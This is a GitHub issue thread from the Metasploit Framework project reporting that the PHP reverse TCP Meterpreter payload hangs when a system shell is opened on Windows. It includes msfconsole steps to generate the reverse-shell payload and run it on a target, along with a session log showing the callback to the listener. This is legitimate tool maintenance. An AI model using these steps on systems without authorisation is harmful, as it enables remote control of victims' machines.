### ISSUE TITLE
PHP Reverse TCP Meterpreter hangs and timeouts with system command shell

### ISSUE THREAD

**Issue by cdelafuente-r7** [rapid7/metasploit-framework#18246]
## Steps to reproduce

How'd you do it?

1. Do: `use php/meterpreter/reverse_tcp`
2. Do: `set lhost <local IP>`
3. Do: `generate -f raw`
4. Copy the generated PHP code
5. Do: `to_handler`

On the Windows target:
1. Open a command line shell (`cmd`)
2. Change to the directory where PHP is installed
3. Run an interactive PHP shell: `php.exe -a`
4. Paste the generated PHP code and hit enter

The Meterpreter session is established and works with commands like `getuid`, `sysinfo`, `ls`, `ps`, etc.
However, when starting a shell with the `shell` command, it hangs when entering shell commands (timeout).

## Expected behavior

Shell commands should execute correctly.

## Current behavior

```
msf6 payload(php/meterpreter/reverse_tcp) >
[*] Sending stage (39927 bytes) to 192.168.100.146
[*] Meterpreter session 5 opened (192.168.100.1:4444 -> 192.168.100.146:50581) at 2023-08-02 14:44:24 +0200

msf6 payload(php/meterpreter/reverse_tcp) > sessions -i 5
[*] Starting interaction with 5...

meterpreter > sysinfo
Computer    : WIN112H22
OS          : Windows NT WIN112H22 10.0 build 22621 (Windows 11) AMD64
Meterpreter : php/windows
meterpreter > getuid
Server username:
meterpreter > shell
Process 10328 created.
Channel 0 created.
Microsoft Windows [Version 10.0.22621.1555]
(c) Microsoft Corporation. All rights reserved.

C:\php>ls
 ---- [hang] ----
Terminate channel 0? [y/N]  y
[-] Error running command shell: Rex::TimeoutError Send timed out
```

### Metasploit version

```
Framework: 6.3.28-dev-11fb61c3b6
Console  : 6.3.28-dev-11fb61c3b6
```

## Additional Information
I was able to reproduce this issue on both Windows Server 2016 with PHP version 7.4.3 and Windows 11 22H2 with PHP version 8.9.0.
The original PR where this problem was reported: https://github.com/rapid7/metasploit-framework/pull/18211

**Comment by sempervictus** [comment]
Is it meterp or php on windows that's at fault here?
